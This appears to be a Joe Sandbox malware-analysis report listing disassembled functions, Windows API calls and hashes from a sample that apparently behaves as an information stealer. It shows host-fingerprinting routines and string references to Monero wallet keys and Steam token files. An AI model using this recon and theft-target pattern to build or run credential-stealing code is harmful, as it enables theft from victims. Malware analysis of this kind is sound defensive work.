Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: 50d153cdeb55300953ed4378dbc5dc52c087853eb0af92e204e231dfb8ef6465
Instruction ID: dca99fcc5597cb549ee226a7c0b871d762300e1592bc26c2c6d4db394eebddeb
Opcode Fuzzy Hash: 50d153cdeb55300953ed4378dbc5dc52c087853eb0af92e204e231dfb8ef6465
Instruction Fuzzy Hash: 82E0867094630CFFEB146BA19C0EB08777CBB04B01F300155FB087A5C0CAB526009699

Function 006A1A10 Relevance: 3.9, APIs: 2, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,01359078,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905

Part of subcall function 006A7500: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 006A7542
Part of subcall function 006A7500: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006A757F
Part of subcall function 006A7500: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006A7603
Part of subcall function 006A7500: RtlAllocateHeap.NTDLL(00000000), ref: 006A760A

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982

Part of subcall function 006A7690: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006A76A4
Part of subcall function 006A7690: RtlAllocateHeap.NTDLL(00000000), ref: 006A76AB

Part of subcall function 006A77C0: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,006ADBC0,000000FF,?,006A1C99,00000000,?,0135DA60,00000000,?), ref: 006A77F2
Part of subcall function 006A77C0: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,006ADBC0,000000FF,?,006A1C99,00000000,?,0135DA60,00000000,?), ref: 006A77F9

Part of subcall function 006A7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006911B7), ref: 006A7880
Part of subcall function 006A7850: RtlAllocateHeap.NTDLL(00000000), ref: 006A7887
Part of subcall function 006A7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 006A789F

Part of subcall function 006A78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006A7910
Part of subcall function 006A78E0: RtlAllocateHeap.NTDLL(00000000), ref: 006A7917
Part of subcall function 006A78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 006A792F

Part of subcall function 006A7980: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,006B0E00,00000000,?), ref: 006A79B0
Part of subcall function 006A7980: RtlAllocateHeap.NTDLL(00000000), ref: 006A79B7
Part of subcall function 006A7980: GetLocalTime.KERNEL32(?,?,?,?,?,006B0E00,00000000,?), ref: 006A79C4
Part of subcall function 006A7980: wsprintfA.USER32 ref: 006A79F3

Part of subcall function 006A7A30: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0135DF00,00000000,?,006B0E10,00000000,?,00000000,00000000), ref: 006A7A63
Part of subcall function 006A7A30: RtlAllocateHeap.NTDLL(00000000), ref: 006A7A6A
Part of subcall function 006A7A30: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0135DF00,00000000,?,006B0E10,00000000,?,00000000,00000000,?), ref: 006A7A7D

Part of subcall function 006A7B00: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,0135DF00,00000000,?,006B0E10,00000000,?,00000000,00000000), ref: 006A7B35

Part of subcall function 006A7B90: GetKeyboardLayoutList.USER32(00000000,00000000,006B05AF), ref: 006A7BE1
Part of subcall function 006A7B90: LocalAlloc.KERNEL32(00000040,?), ref: 006A7BF9
Part of subcall function 006A7B90: GetKeyboardLayoutList.USER32(?,00000000), ref: 006A7C0D
Part of subcall function 006A7B90: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 006A7C62
Part of subcall function 006A7B90: LocalFree.KERNEL32(00000000), ref: 006A7D22

Part of subcall function 006A7D80: GetSystemPowerStatus.KERNEL32(?), ref: 006A7DAD

GetCurrentProcessId.KERNEL32(00000000,?,0135DC40,00000000,?,006B0E24,00000000,?,00000000,00000000,?,0135DF78,00000000,?,006B0E20,00000000), ref: 006A207E

Part of subcall function 006A9470: OpenProcess.KERNEL32(00000410,00000000,?), ref: 006A9484
Part of subcall function 006A9470: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 006A94A5
Part of subcall function 006A9470: CloseHandle.KERNEL32(00000000), ref: 006A94AF

Part of subcall function 006A7E00: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006A7E37
Part of subcall function 006A7E00: RtlAllocateHeap.NTDLL(00000000), ref: 006A7E3E
Part of subcall function 006A7E00: RegOpenKeyExA.KERNEL32(80000002,0134C010,00000000,00020119,?), ref: 006A7E5E
Part of subcall function 006A7E00: RegQueryValueExA.KERNEL32(?,0135DC60,00000000,00000000,000000FF,000000FF), ref: 006A7E7F
Part of subcall function 006A7E00: RegCloseKey.ADVAPI32(?), ref: 006A7E92

Part of subcall function 006A7F60: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 006A7FC9
Part of subcall function 006A7F60: GetLastError.KERNEL32 ref: 006A7FD8

Part of subcall function 006A7ED0: GetSystemInfo.KERNEL32(006B0E2C), ref: 006A7F00
Part of subcall function 006A7ED0: wsprintfA.USER32 ref: 006A7F16

Part of subcall function 006A8100: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0135E0B0,00000000,?,006B0E2C,00000000,?,00000000), ref: 006A8130
Part of subcall function 006A8100: RtlAllocateHeap.NTDLL(00000000), ref: 006A8137
Part of subcall function 006A8100: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 006A8158
Part of subcall function 006A8100: __aulldiv.LIBCMT ref: 006A8172
Part of subcall function 006A8100: __aulldiv.LIBCMT ref: 006A8180
Part of subcall function 006A8100: wsprintfA.USER32 ref: 006A81AC

Part of subcall function 006A87C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,006B0E28,00000000,?), ref: 006A882F
Part of subcall function 006A87C0: RtlAllocateHeap.NTDLL(00000000), ref: 006A8836
Part of subcall function 006A87C0: wsprintfA.USER32 ref: 006A8850

Part of subcall function 006A8320: RegOpenKeyExA.KERNEL32(00000000,0135B148,00000000,00020019,00000000,006B05B6), ref: 006A83A4

Part of subcall function 006A8320: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 006A8426
Part of subcall function 006A8320: wsprintfA.USER32 ref: 006A8459
Part of subcall function 006A8320: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 006A847B
Part of subcall function 006A8320: RegCloseKey.ADVAPI32(00000000), ref: 006A848C
Part of subcall function 006A8320: RegCloseKey.ADVAPI32(00000000), ref: 006A8499

Part of subcall function 006A8680: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,006B05B7), ref: 006A86CA
Part of subcall function 006A8680: Process32First.KERNEL32(?,00000128), ref: 006A86DE
Part of subcall function 006A8680: Process32Next.KERNEL32(?,00000128), ref: 006A86F3
Part of subcall function 006A8680: CloseHandle.KERNEL32(?), ref: 006A8761

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 006A265B

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$Allocate$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUser__aulldivlstrcatlstrlen$AllocComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
String ID:
API String ID: 3113730047-0
Opcode ID: 0a92c9f127214ac93ff1c1baeced9d0bd79cee7e49d9db55bd0ceb351844f982
Instruction ID: 15feaf1985a214cf2a227aa5af76955e9fa7ce0eada8ec1ef79794abbac72005
Opcode Fuzzy Hash: 0a92c9f127214ac93ff1c1baeced9d0bd79cee7e49d9db55bd0ceb351844f982
Instruction Fuzzy Hash: 74723C71811118AADB99FBD0DC92DEE733AAF15300F51829EB11762092EF346F49CF69

Function 00696D40 Relevance: 3.2, APIs: 2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 005942512fbdd297533d8083f384fc450c5b314a65de163824d1378815516a93
Instruction ID: cc577314054a6271d57e149119b0af11aed22f175985d858bc9690c17f22a06f
Opcode Fuzzy Hash: 005942512fbdd297533d8083f384fc450c5b314a65de163824d1378815516a93
Instruction Fuzzy Hash: 686113B4900218EBCF14CF94E984BEEB7BABB08304F108599F419A7780D775AE94DF91

Function 006A5100 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

Part of subcall function 006AA820: lstrlen.KERNEL32(00694F05,?,?,00694F05,006B0DDE), ref: 006AA82B
Part of subcall function 006AA820: lstrcpy.KERNEL32(006B0DDE,00000000), ref: 006AA885

lstrlen.KERNEL32(00000000,00000000,006B0ACA), ref: 006A512A

Strings

steam_tokens.txt, xrefs: 006A513F

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID: steam_tokens.txt
API String ID: 2001356338-401951677
Opcode ID: bb998f6215fdfa8e65412dbc151fdc91474cdb7432559751017f3910e2541cfa
Instruction ID: d46b0eff66fe3f5dd7a42a8db325fab758d25d85dd4c4c5579af532ede804e5d
Opcode Fuzzy Hash: bb998f6215fdfa8e65412dbc151fdc91474cdb7432559751017f3910e2541cfa
Instruction Fuzzy Hash: 74F04B7190010866CB84FBF0DC529ED733EAB16300F50425EB81366492EF246E09CBAA

Function 006A7ED0 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(006B0E2C), ref: 006A7F00
wsprintfA.USER32 ref: 006A7F16

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: b3c86fab9120eacfcaa0110a85ff60fff98263e61e9e6d8be7c2631aa1f5e5ba
Instruction ID: f9cb37cc697deadc9939d0d5be67b97ab604dc8dc0fc261968c7cee8b2d3bd3e
Opcode Fuzzy Hash: b3c86fab9120eacfcaa0110a85ff60fff98263e61e9e6d8be7c2631aa1f5e5ba
Instruction Fuzzy Hash: C6F090F1A04208EBCB14DF84EC45FEAFBBCFB49B24F10066AF51592680D7756A448BE1

Function 0069B4F0 Relevance: 2.9, APIs: 2, Instructions: 397stringCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,01359078,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

lstrlen.KERNEL32(00000000), ref: 0069B9C2
lstrlen.KERNEL32(00000000), ref: 0069B9D6

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: df2f33cb3ec0ee73b678862ff2680b48ba7f20c0c605f8522f2e5706c89b4f8b
Instruction ID: e0106d19760e057a8466e2dc0e705bf87783faf3a2140909137a1c2d11c2486d
Opcode Fuzzy Hash: df2f33cb3ec0ee73b678862ff2680b48ba7f20c0c605f8522f2e5706c89b4f8b
Instruction Fuzzy Hash: EFE1D9729211189ADB88FBE0DC92EEE733ABF15300F50415EB50766091EF346E49CFA6

Function 0069AEF0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,01359078,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
